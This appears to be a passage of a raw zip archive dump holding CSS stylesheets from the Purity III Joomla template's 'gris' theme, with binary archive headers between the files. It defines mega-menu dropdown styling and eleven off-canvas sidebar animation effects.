  color: #333;
}PKԜ�\�6)�p7p7-purity_iii/local/css/themes/gris/megamenu.cssnu&1i�.t3-megamenu .mega-inner:before,
.t3-megamenu .mega-inner:after {
  content: " ";
  display: table;
}
.t3-megamenu .mega-inner:after {
  clear: both;
}
.t3-megamenu .mega > .mega-dropdown-menu {
  min-width: 200px;
  display: none;
}
.t3-megamenu .mega.open > .mega-dropdown-menu,
.t3-megamenu .mega.dropdown-submenu.open > .mega-dropdown-menu {
  display: block;
}
.t3-megamenu .mega-group:before,
.t3-megamenu .mega-group:after {
  content: " ";
  display: table;
}
.t3-megamenu .mega-group:after {
  clear: both;
}
.t3-megamenu .dropdown-header,
.t3-megamenu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
}
.t3-megamenu .dropdown-header:hover,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-header:active,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-header:focus,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .mega-group-ct {
  margin: 0;
  padding: 0;
}
.t3-megamenu .mega-group-ct:before,
.t3-megamenu .mega-group-ct:after {
  content: " ";
  display: table;
}
.t3-megamenu .mega-group-ct:after {
  clear: both;
}
.t3-megamenu .mega-nav,
.t3-megamenu .dropdown-menu .mega-nav {
  margin: 0;
  padding: 0;
  list-style: none;
}
.t3-megamenu .mega-nav > li,
.t3-megamenu .dropdown-menu .mega-nav > li {
  list-style: none;
  margin-left: 0;
}
.t3-megamenu .mega-nav > li a,
.t3-megamenu .dropdown-menu .mega-nav > li a {
  white-space: normal;
  display: block;
  padding: 5px;
}
.t3-megamenu .mega-nav > li a:hover,
.t3-megamenu .dropdown-menu .mega-nav > li a:hover,
.t3-megamenu .mega-nav > li a:focus,
.t3-megamenu .dropdown-menu .mega-nav > li a:focus {
  text-decoration: none;
  color: #ffffff;
  background-color: #515151;
}
.t3-megamenu .mega-nav > li .separator {
  display: block;
  padding: 5px;
}
.t3-megamenu .mega-group > .mega-nav,
.t3-megamenu .dropdown-menu .mega-group > .mega-nav {
  margin-left: -5px;
  margin-right: -5px;
}
.t3-megamenu .mega-nav .dropdown-submenu > a::after {
  margin-right: 5px;
}
.t3-megamenu .t3-module {
  margin-bottom: 10px;
}
.t3-megamenu .t3-module .module-title {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  margin-bottom: 5px;
}
.t3-megamenu .t3-module .module-title:hover,
.t3-megamenu .t3-module .module-title:active,
.t3-megamenu .t3-module .module-title:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .t3-module .module-ct {
  margin: 0;
  padding: 0;
}
.t3-megamenu .mega-caption {
  display: block;
  white-space: nowrap;
}
.t3-megamenu .nav .caret,
.t3-megamenu .dropdown-submenu .caret,
.t3-megamenu .mega-menu .caret {
  display: none;
}
.t3-megamenu .nav > .dropdown > .dropdown-toggle .caret {
  display: inline-block;
}
.t3-megamenu .nav [class^="icon-"],
.t3-megamenu .nav [class*=" icon-"],
.t3-megamenu .nav .fa {
  margin-right: 5px;
}
.t3-megamenu .nav .input-group-addon [class^="icon-"],
.t3-megamenu .nav .input-group-addon [class*=" icon-"],
.t3-megamenu .nav .input-group-addon .fa {
  margin-right: 0;
}
.t3-megamenu .mega-align-left > .dropdown-menu {
  left: 0;
}
.t3-megamenu .mega-align-right > .dropdown-menu {
  left: auto;
  right: 0;
}
.t3-megamenu .mega-align-center > .dropdown-menu {
  left: 50%;
  -webkit-transform: translate(-50%, 0);
  -ms-transform: translate(-50%, 0);
  -o-transform: translate(-50%, 0);
  transform: translate(-50%, 0);
}
.t3-megamenu .dropdown-submenu.mega-align-left > .dropdown-menu {
  left: 100%;
}
.t3-megamenu .dropdown-submenu.mega-align-right > .dropdown-menu {
  left: auto;
  right: 100%;
}
.t3-megamenu .mega-align-justify {
  position: static;
}
.t3-megamenu .mega-align-justify > .dropdown-menu {
  left: 0;
  margin-left: 0;
  top: auto;
}
.t3-megamenu .mega-tab > div {
  position: relative;
}
.t3-megamenu .mega-tab > div > ul {
  width: 200px;
}
.t3-megamenu .mega-tab > div > ul > li {
  position: static;
}
.t3-megamenu .mega-tab > div > ul > li > .dropdown-menu {
  position: absolute;
  top: 0;
  right: 0;
  bottom: 0;
  left: 200px;
}
.t3-megamenu .mega-tab > div > ul > li > .mega-dropdown-menu {
  border: none;
  box-shadow: none;
}
.t3-megamenu .mega-tab > div > ul > li > .mega-dropdown-menu > div {
  opacity: 1 !important;
  margin-left: 0 !important;
  transition: none !important;
}
@media (min-width: 991px) {
  .t3-megamenu.animate .mega > .mega-dropdown-menu {
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    opacity: 0;
  }
  .t3-megamenu.animate .mega.animating > .mega-dropdown-menu {
    -webkit-transition: all 400ms;
    -o-transition: all 400ms;
    transition: all 400ms;
    display: block;
  }
  .t3-megamenu.animate .mega.open > .mega-dropdown-menu,
  .t3-megamenu.animate .mega.animating.open > .mega-dropdown-menu {
    opacity: 1;
  }
  .t3-megamenu.animate.zoom .mega > .mega-dropdown-menu {
    -webkit-transform: scale(0, 0);
    -ms-transform: scale(0, 0);
    -o-transform: scale(0, 0);
    transform: scale(0, 0);
    -webkit-transform-origin: 20% 20%;
    -moz-transform-origin: 20% 20%;
    -ms-transform-origin: 20% 20%;
    transform-origin: 20% 20%;
  }
  .t3-megamenu.animate.zoom .mega.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.zoom .level0 > .mega-align-center > .mega-dropdown-menu {
    -webkit-transform: scale(0, 0) translate(-50%, 0);
    -ms-transform: scale(0, 0) translate(-50%, 0);
    transform: scale(0, 0) translate(-50%, 0);
    -webkit-transform-origin: 0% 20%;
    -moz-transform-origin: 0% 20%;
    -ms-transform-origin: 0% 20%;
    transform-origin: 0% 20%;
  }
  .t3-megamenu.animate.zoom .level0 > .mega-align-center.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1) translate(-50%, 0);
    -ms-transform: scale(1, 1) translate(-50%, 0);
    transform: scale(1, 1) translate(-50%, 0);
  }
  .t3-megamenu.animate.elastic .mega > .mega-dropdown-menu {
    -webkit-transform: scale(0, 1);
    -ms-transform: scale(0, 1);
    -o-transform: scale(0, 1);
    transform: scale(0, 1);
    -webkit-transform-origin: 10% 0;
    -moz-transform-origin: 10% 0;
    -ms-transform-origin: 10% 0;
    transform-origin: 10% 0;
  }
  .t3-megamenu.animate.elastic .mega.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.elastic .level0 > .mega > .mega-dropdown-menu {
    -webkit-transform: scale(1, 0);
    -ms-transform: scale(1, 0);
    -o-transform: scale(1, 0);
    transform: scale(1, 0);
  }
  .t3-megamenu.animate.elastic .level0 .open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.elastic .level0 > .mega-align-center > .mega-dropdown-menu {
    transform: scale(1, 0) translate(-50%, 0);
    -webkit-transform: scale(1, 0) translate(-50%, 0);
    -ms-transform: scale(1, 0) translate(-50%, 0);
  }
  .t3-megamenu.animate.elastic .level0 > .mega-align-center.open > .mega-dropdown-menu {
    transform: scale(1, 1) translate(-50%, 0);
    -webkit-transform: scale(1, 1) translate(-50%, 0);
    -ms-transform: scale(1, 1) translate(-50%, 0);
  }
  .t3-megamenu.animate.slide .mega {
    
    
  }
  .t3-megamenu.animate.slide .mega.animating > .mega-dropdown-menu {
    overflow: hidden;
  }
  .t3-megamenu.animate.slide .mega > .mega-dropdown-menu > div {
    -webkit-transition: all 400ms;
    -o-transition: all 400ms;
    transition: all 400ms;
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    margin-top: -30%;
  }
  .t3-megamenu.animate.slide .mega.open > .mega-dropdown-menu > div {
    margin-top: 0%;
  }
  .t3-megamenu.animate.slide .mega .mega > .mega-dropdown-menu {
    min-width: 0;
  }
  .t3-megamenu.animate.slide .mega .mega > .mega-dropdown-menu > div {
    min-width: 200px;
    margin-top: 0;
    margin-left: -500px;
    width: 100%;
  }
  .t3-megamenu.animate.slide .mega .mega.open > .mega-dropdown-menu > div {
    margin-left: 0;
  }
}
@media (max-width: 990px) {
  .t3-megamenu .mega-inner:before,
  .t3-megamenu .mega-inner:after {
    content: " ";
    display: table;
  }
  .t3-megamenu .mega-inner:after {
    clear: both;
  }
  .t3-megamenu .row,
  .t3-megamenu .mega-dropdown-menu,
  .t3-megamenu .row [class*="col-lg-"],
  .t3-megamenu .row [class*="col-md-"],
  .t3-megamenu .row [class*="col-sm-"],
  .t3-megamenu .row [class*="col-xs-"] {
    width: 100% !important;
    min-width: 100% !important;
    left: 0 !important;
    margin-left: 0 !important;
    -webkit-transform: none !important;
    -ms-transform: none !important;
    transform: none !important;
  }
  .t3-megamenu .hidden-collapse,
  .t3-megamenu .always-show .caret,
  .t3-megamenu .always-show .dropdown-submenu > a:after .sub-hidden-collapse > .nav-child,
  .t3-megamenu .sub-hidden-collapse .caret,
  .t3-megamenu .sub-hidden-collapse > a:after {
    display: none !important;
  }
  .mega-caption {
    display: none !important;
  }
  html[dir="rtl"] .t3-megamenu .row,
  html[dir="rtl"] .t3-megamenu .mega-dropdown-menu,
  html[dir="rtl"] .t3-megamenu .row [class*="col-lg-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-md-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-sm-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-xs-"] {
    left: auto;
    right: 0 !important;
    margin-right: 0 !important;
  }
}
.t3-megamenu .mega-inner {
  padding: 20px 0;
}
.t3-megamenu .row {
  margin-left: auto;
  margin-right: auto;
}
.t3-megamenu .row + .row {
  padding-top: 10px;
  border-top: 1px solid #515151;
}
.t3-megamenu .mega-dropdown-menu {
  color: #f7f7f7;
}
.t3-megamenu .mega-group {
  border: 0 !important;
}
.t3-megamenu .dropdown-header,
.t3-megamenu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  white-space: nowrap;
}
.t3-megamenu .dropdown-header:hover,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-header:active,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-header:focus,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .mega-group-ct .row {
  margin-left: -15px;
  margin-right: -15px;
}
.t3-megamenu .mega-nav > li,
.t3-megamenu .dropdown-menu .mega-nav > li {
  border-bottom: 1px solid #515151;
}
.t3-megamenu .mega-nav > li:first-child,
.t3-megamenu .dropdown-menu .mega-nav > li:first-child {
  border-top: 1px solid #515151;
}
.t3-megamenu .mega-nav > li a,
.t3-megamenu .dropdown-menu .mega-nav > li a {
  padding: 10px;
  color: #eeeeee;
}
.t3-megamenu .mega-nav > li.open > a,
.t3-megamenu .dropdown-menu .mega-nav > li.open > a {
  background: #515151;
}
.t3-megamenu .mega-nav > li.active > a,
.t3-megamenu .dropdown-menu .mega-nav > li.active > a {
  color: #ffffff;
  background: #515151;
}
.t3-megamenu .mega-nav .dropdown-submenu > a::after {
  margin-right: 0;
}
.t3-megamenu .t3-module .module-title {
  color: #eeeeee;
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  white-space: nowrap;
  margin-bottom: 20px;
}
.t3-megamenu .t3-module .module-title:hover,
.t3-megamenu .t3-module .module-title:active,
.t3-megamenu .t3-module .module-title:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .t3-module ul,
.t3-megamenu .t3-module .nav {
  padding-left: 20px;
}
.t3-megamenu .t3-module ul li,
.t3-megamenu .t3-module .nav li {
  list-style: disc;
  display: list-item;
  float: none;
  margin: 0;
  padding: 0;
  border: 0;
}
.t3-megamenu .t3-module ul li a,
.t3-megamenu .t3-module .nav li a {
  display: inline;
  padding: 0;
  margin: 0;
  border: 0;
  font-size: 100%;
  background: none;
  font: inherit;
  white-space: normal;
  color: #f7f7f7;
}
.t3-megamenu .t3-module ul li a:hover,
.t3-megamenu .t3-module .nav li a:hover,
.t3-megamenu .t3-module ul li a:focus,
.t3-megamenu .t3-module .nav li a:focus,
.t3-megamenu .t3-module ul li a:active,
.t3-megamenu .t3-module .nav li a:active {
  background: transparent;
  color: #454444;
  font: inherit;
}
.t3-megamenu .mega-caption {
  color: #999999;
  font-size: 12px;
  margin-top: 3px;
  font-weight: normal;
}
.t3-megamenu .nav .input-group-addon [class^="icon-"],
.t3-megamenu .nav .input-group-addon [class*=" icon-"],
.t3-megamenu .nav .input-group-addon .fa {
  margin-right: 0;
}PKԜ�\}�F�cOcO/purity_iii/local/css/themes/gris/off-canvas.cssnu&1i�.off-canvas-toggle {
  z-index: 100;
}
html,
body {
  height: 100%;
}
.noscroll {
  position: fixed;
  overflow-y: scroll;
  width: 100%;
}
.t3-wrapper {
  background: #ffffff;
  position: relative;
  left: 0;
  z-index: 99;
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  overflow: visible;
}
.t3-wrapper::after {
  position: absolute;
  top: 0;
  right: 0;
  width: 0;
  height: 0;
  background: rgba(0, 0, 0, 0.2);
  content: '';
  opacity: 0;
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  z-index: 100;
}
.t3-mainnav-android {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.t3-mainnav-android::after {
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
}
.off-canvas-open .t3-wrapper::after {
  width: 100%;
  height: 10000px;
  opacity: 1;
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.off-canvas-open .t3-mainnav-android::after {
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.t3-off-canvas {
  position: absolute;
  top: 0;
  left: 0;
  z-index: 100;
  visibility: hidden;
  width: 250px;
  height: 100%;
  overflow: hidden;
  -webkit-transition: all 0.5s;
  transition: all 0.5s;
}
.t3-off-canvas::after {
  position: absolute;
  top: 0;
  right: 0;
  width: 100%;
  height: 100%;
  background: rgba(0, 0, 0, 0.2);
  content: '';
  opacity: 1;
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.off-canvas-right.t3-off-canvas {
  display: none;
}
.off-canvas-right .off-canvas-right.t3-off-canvas {
  display: block;
}
html[dir="ltr"] .off-canvas-right.t3-off-canvas {
  left: auto;
  right: 0;
}
.off-canvas-open .t3-off-canvas::after {
  width: 0;
  height: 0;
  opacity: 0;
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
}
.off-canvas-open .off-canvas-current {
  visibility: visible;
}
.off-canvas-open .t3-off-canvas {
  overflow-y: auto;
}
.t3-off-canvas {
  background: #ffffff;
  color: #444444;
}
.t3-off-canvas .t3-off-canvas-header {
  background: #eeeeee;
  color: #444444;
  padding: 6px 12px;
}
.t3-off-canvas .t3-off-canvas-header h2 {
  margin: 0;
}
.t3-off-canvas .t3-off-canvas-body {
  padding: 6px 12px;
}
.t3-off-canvas .t3-off-canvas-body a {
  color: #454444;
}
.t3-off-canvas .t3-off-canvas-body a:hover,
.t3-off-canvas .t3-off-canvas-body a:focus {
  color: #1e1e1e;
}
.t3-off-canvas .t3-off-canvas-body a:focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.t3-off-canvas .t3-off-canvas-body .dropdown-menu {
  position: static;
  float: none;
  display: block;
  width: 100%;
  padding: 0;
  border: 0;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-1.off-canvas-open .off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-1.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
.off-canvas-effect-2.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-2.t3-off-canvas {
  z-index: 1;
}
.off-canvas-effect-2.off-canvas-open .off-canvas-effect-2.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.off-canvas-effect-2.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-2.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-effect-3.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-3.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-3.off-canvas-open .off-canvas-effect-3.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.off-canvas-effect-3.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-3.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-3.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
.off-canvas-effect-4.off-canvas-open .t3-wrapper,
.off-canvas-effect-4.off-canvas-open .t3-mainnav-android {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-4.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(-50%, 0, 0);
  transform: translate3d(-50%, 0, 0);
}
.off-canvas-effect-4.off-canvas-open .off-canvas-effect-4.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-4.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-4.off-canvas-open .t3-wrapper,
.off-canvas-right.off-canvas-effect-4.off-canvas-open .t3-mainnav-android {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-4.t3-off-canvas {
  -webkit-transform: translate3d(50%, 0, 0);
  transform: translate3d(50%, 0, 0);
}
.off-canvas-effect-5.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-5.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(50%, 0, 0);
  transform: translate3d(50%, 0, 0);
}
.off-canvas-effect-5.off-canvas-open .off-canvas-effect-5.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-right.off-canvas-effect-5.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-5.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(-50%, 0, 0);
  transform: translate3d(-50%, 0, 0);
}
body.off-canvas-effect-6 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-6 .t3-wrapper {
  -webkit-transform-origin: 0% 50%;
  transform-origin: 0% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
  height: auto;
  overflow: hidden;
}
.off-canvas-effect-6.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0) rotateY(-15deg);
  transform: translate3d(250px, 0, 0) rotateY(-15deg);
}
.off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-6.off-canvas-open .off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-6.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-6 .t3-wrapper {
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-6.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0) rotateY(15deg);
  transform: translate3d(-250px, 0, 0) rotateY(15deg);
}
.off-canvas-right.off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-7 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-7 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-7.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(-90deg);
  transform: translate3d(-100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-7.off-canvas-open .off-canvas-effect-7.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-7.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-7.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(90deg);
  transform: translate3d(100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-7.off-canvas-open .off-canvas-right.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-8 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-8 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-8.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(90deg);
  transform: translate3d(-100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-8.off-canvas-open .off-canvas-effect-8.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
.off-canvas-effect-8.t3-off-canvas::after {
  display: none;
}
body.off-canvas-effect-8.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-8.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(-90deg);
  transform: translate3d(100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-8.off-canvas-open .off-canvas-right.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-9 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-9 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-9.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(0, 0, -250px);
  transform: translate3d(0, 0, -250px);
}
.off-canvas-effect-9.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-9.off-canvas-open .off-canvas-effect-9.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-9.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-9.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-10 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-10.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-10.t3-off-canvas {
  z-index: 1;
  opacity: 1;
  -webkit-transform: translate3d(0, 0, -250px);
  transform: translate3d(0, 0, -250px);
}
.off-canvas-effect-10.off-canvas-open .off-canvas-effect-10.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
body.off-canvas-effect-10.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-10.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
body.off-canvas-effect-11 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-11 .t3-wrapper {
  height: auto;
  overflow: hidden;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-11.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(100px, 0, -600px) rotateY(-20deg);
  transform: translate3d(100px, 0, -600px) rotateY(-20deg);
}
.off-canvas-effect-11.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-11.off-canvas-open .off-canvas-effect-11.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-11.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-11.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-100px, 0, -600px) rotateY(20deg);
  transform: translate3d(-100px, 0, -600px) rotateY(20deg);
}
